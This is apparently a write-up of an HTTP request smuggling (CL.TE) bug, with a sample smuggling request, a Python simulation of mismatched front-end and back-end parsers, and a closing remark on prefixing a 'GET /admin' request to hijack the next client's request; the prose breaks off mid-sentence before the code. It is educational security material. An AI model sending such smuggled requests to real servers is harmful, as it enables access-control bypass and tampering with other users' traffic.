This is a write-up of a security bug I found a few months ago: HTTP Request Smuggling (type CL.TE). The vulnerability arises from a disagreement between the front-end and back-end servers on how to parse an incoming HTTP request stream, specifically on where one request ends and the next begins. CL.TE is the variant in which the front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header to find the request boundary, which desynchronises the two servers' view of the same connection. For a more in-depth understanding of the underlying concepts of this vulnerability, I suggest reading this for additional reference.

Example:

```http
POST / HTTP/1.1
Host: test.com
Content-Length: 12
Transfer-Encoding: chunked

0\r\n
\r\n
TESTING
```

In the above example, the front-end server honours the Content-Length header and reads 12 bytes of body, i.e. up to the end of TESTING. I have written the \r\n sequences out explicitly to show why the content length is 12 bytes here (the 0, two CRLFs and the 7 bytes of TESTING); these bytes are not visible in the original request. Now, once this request is r...
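To make the desynchronisation concrete, here is a small simulation I am adding to this write-up (it is not the vulnerable site's software, nor code from the original post). Two deliberately minimal parser models read the same byte stream: one honours Content-Length the way the front-end does, the other honours Transfer-Encoding: chunked the way the back-end does. The request bytes and the follow-up GET /next request are constructed for the example; the header values match the request shown above.

```python
# Added example: modelling a CL.TE front-end/back-end pair on one byte stream.
# Both parsers are simplified models written for this write-up, not real servers.

def parse_headers(head: bytes) -> dict:
    """Return the header block (everything after the request line) as a lowercase dict."""
    hdrs = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        hdrs[name.strip().lower().decode()] = value.strip().decode()
    return hdrs


def read_chunked(rest: bytes):
    """Consume a chunked body; return (body, bytes left over after the terminating chunk)."""
    body = b""
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line.split(b";")[0].decode(), 16)  # ignore chunk extensions
        if size == 0:
            # last chunk: skip any trailer lines up to and including the blank line
            while True:
                line, _, rest = rest.partition(b"\r\n")
                if line == b"":
                    return body, rest
        body += rest[:size]
        rest = rest[size + 2:]  # step over the chunk data and its trailing CRLF


def parse_cl_first(stream: bytes):
    """Model of the front-end: prefers Content-Length over Transfer-Encoding."""
    head, _, rest = stream.partition(b"\r\n\r\n")
    hdrs = parse_headers(head)
    if "content-length" in hdrs:
        n = int(hdrs["content-length"])
        return head, rest[:n], rest[n:]
    if hdrs.get("transfer-encoding", "").lower() == "chunked":
        body, rest = read_chunked(rest)
        return head, body, rest
    return head, b"", rest


def parse_te_first(stream: bytes):
    """Model of the back-end: prefers Transfer-Encoding: chunked over Content-Length."""
    head, _, rest = stream.partition(b"\r\n\r\n")
    hdrs = parse_headers(head)
    if hdrs.get("transfer-encoding", "").lower() == "chunked":
        body, rest = read_chunked(rest)
        return head, body, rest
    n = int(hdrs.get("content-length", "0"))
    return head, rest[:n], rest[n:]


# Constructed input: the CL.TE request from the write-up, followed on the same
# connection by an innocent request from (notionally) another user.
SMUGGLE = (
    b"POST / HTTP/1.1\r\n"
    b"Host: test.com\r\n"
    b"Content-Length: 12\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"TESTING"
)
NEXT = b"GET /next HTTP/1.1\r\nHost: test.com\r\n\r\n"


def demonstrate(stream: bytes = SMUGGLE + NEXT) -> dict:
    """Show where each side thinks the first request ends and what it sees next."""
    _, fe_body, fe_rest = parse_cl_first(stream)
    _, be_body, be_rest = parse_te_first(stream)
    return {
        "frontend_body": fe_body,   # 12 bytes: b"0\r\n\r\nTESTING"
        "frontend_next": fe_rest,   # the clean GET /next request
        "backend_body": be_body,    # empty: the 0 chunk ends the body
        "backend_next": be_rest,    # b"TESTING" prepended to the next request
    }


if __name__ == "__main__":
    for k, v in demonstrate().items():
        print(f"{k:14} {v!r}")
```

The front-end forwards the whole 12-byte body and then the next request, but the back-end stops at the 0 chunk and keeps TESTING in its buffer, so the next request on that connection arrives as TESTINGGET /next ... . Replace TESTING with a full request prefix (for example GET /admin HTTP/1.1 plus headers) and that is the request the back-end executes on behalf of whichever client's request lands next.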